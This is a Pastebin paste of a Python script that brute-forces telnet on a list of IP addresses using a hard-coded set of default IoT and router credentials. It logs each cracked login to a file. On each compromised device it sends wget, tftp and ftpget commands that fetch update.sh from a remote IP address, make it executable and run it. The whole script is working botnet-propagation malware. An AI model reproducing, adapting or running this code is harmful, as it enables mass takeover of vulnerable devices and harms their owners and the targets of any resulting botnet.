Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import threading
- import sys, os, re, time, socket, random, select
- if len(sys.argv) < 4:
- print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
- sys.exit()
- wget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.196/update.sh -O update.sh; busybox wget http://185.10.68.196/update.sh -O update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #wget command to send
- tftp = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r update.sh -g 185.10.68.196; busybox tftp -r update.sh -g 185.10.68.196; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #tftp command to send
- ftpget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh"
- combo = [
- "root:root",
- "root:",
- "admin:admin",
- "support:support",
- "user:user",
- "admin:",
- "admin:password",
- "root:vizxv",
- "root:admin",
- "root:xc3511",
- "root:888888",
- "root:xmhdipc",
- "root:default",
- "root:juantech",
- "root:123456",
- "root:54321",
- "root:12345",
- "root:pass",
- "ubnt:ubnt",
- "root:klv1234",
- "root:Zte521",
- "root:hi3518",
- "root:jvbzd",
- "root:anko",
- "root:zlxx.",
- "root:7ujMko0vizxv",
- "root:7ujMko0admin",
- "root:system",
- "root:ikwb",
- "root:dreambox",
- "root:user",
- "root:realtek",
- "root:00000000",
- "admin:1111111",
- "admin:1234",
- "admin:12345",
- "admin:54321",
- "admin:123456",
- "admin:7ujMko0admin",
- "admin:1234",
- "admin:pass",
- "admin:meinsm",
- "admin:admin1234",
- "root:1111",
- "admin:smcadmin",
- "admin:1111",
- "root:666666",
- "root:password",
- "root:1234",
- "root:klv123",
- "Administrator:admin",
- "service:service",
- "supervisor:supervisor",
- "guest:guest",
- "guest:12345",
- "guest:12345",
- "admin1:password",
- "administrator:1234",
- "666666:666666",
- "888888:888888",
- "tech:tech",
- "mother:fucker"
- ]
- IPs = open(sys.argv[1], "r").read().replace("\r", "").split("\n")
- random.shuffle(IPs)
- threads = int(sys.argv[2])
- output_file = sys.argv[3]
- def readUntil(tn, string, timeout=8):
- buf = ''
- start_time = time.time()
- while time.time() - start_time < timeout:
- buf += tn.recv(1024)
- time.sleep(0.1)
- if string in buf: return buf
- raise Exception('TIMEOUT!')
- def recvTimeout(sock, size, timeout=8):
- sock.setblocking(0)
- ready = select.select([sock], [], [], timeout)
- if ready[0]:
- data = sock.recv(size)
- return data
- return ""
- global active
- active = 0
- global fh
- fh = open(output_file, "a")
- class router(threading.Thread):
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- self.ip = str(ip).rstrip('\n')
- def run(self):
- global active
- global fh
- active += 1
- username = ""
- password = ""
- cracked = False
- for passwd in combo:
- if cracked:
- break
- if ":n/a" in passwd:
- password=""
- else:
- password=passwd.split(":")[1]
- if "n/a:" in passwd:
- username=""
- else:
- username=passwd.split(":")[0]
- try:
- tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- tn.settimeout(0.5)
- tn.connect((self.ip, 23))
- except Exception:
- try:
- tn.close()
- except:
- pass
- break
- try:
- hoho = ''
- hoho += readUntil(tn, ":")
- if ":" in hoho:
- tn.send(username + "\n")
- time.sleep(0.1)
- hoho = ''
- hoho += readUntil(tn, ":")
- if ":" in hoho:
- tn.send(password + "\n")
- time.sleep(0.8)
- else:
- pass
- prompt = ''
- prompt += tn.recv(8912)
- if ">" in prompt and "ONT" not in prompt:
- success = True
- elif "#" in prompt or "$" in prompt or "root@" in prompt or ">" in prompt:
- success = True
- else:
- tn.close()
- if success == True:
- try:
- print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
- cracked = True
- fh.write(self.ip + ":23 " + username + ":" + password + "\n")
- fh.flush()
- tn.send("sh\r\n")
- time.sleep(0.1)
- tn.send("shell\r\n")
- time.sleep(0.1)
- tn.send("ls /\r\n")
- time.sleep(1)
- timeout = 8
- buf = ''
- start_time = time.time()
- while time.time() - start_time < timeout:
- buf += recvTimeout(tn, 8912)
- time.sleep(0.1)
- if "tmp" in buf and "unrecognized" not in buf:
- f = open("infected.txt", "a")
- f.write(self.ip + ":23 " + username + ":" + password + "\n")
- f.close()
- print "\033[32m[\033[31m+\033[32m] \033[33mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
- tn.send(wget + "\r\n")
- time.sleep(10)
- tn.send(tftp + "\r\n")
- time.sleep(10)
- tn.send(ftpget + "\r\n")
- time.sleep(10)
- tn.close()
- break
- tn.close()
- break
- except:
- tn.close()
- else:
- tn.close()
- except Exception:
- tn.close()
- active -= 1
- def worker():
- for IP in IPs:
- threadstarted = False
- while not threadstarted:
- if active < threads:
- try:
- thread = router(IP)
- thread.start()
- threadstarted = True
- except:
- pass
- threading.Thread(target = worker, args = ()).start()
- raw_input()
- os.kill(os.getpid(), 9)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement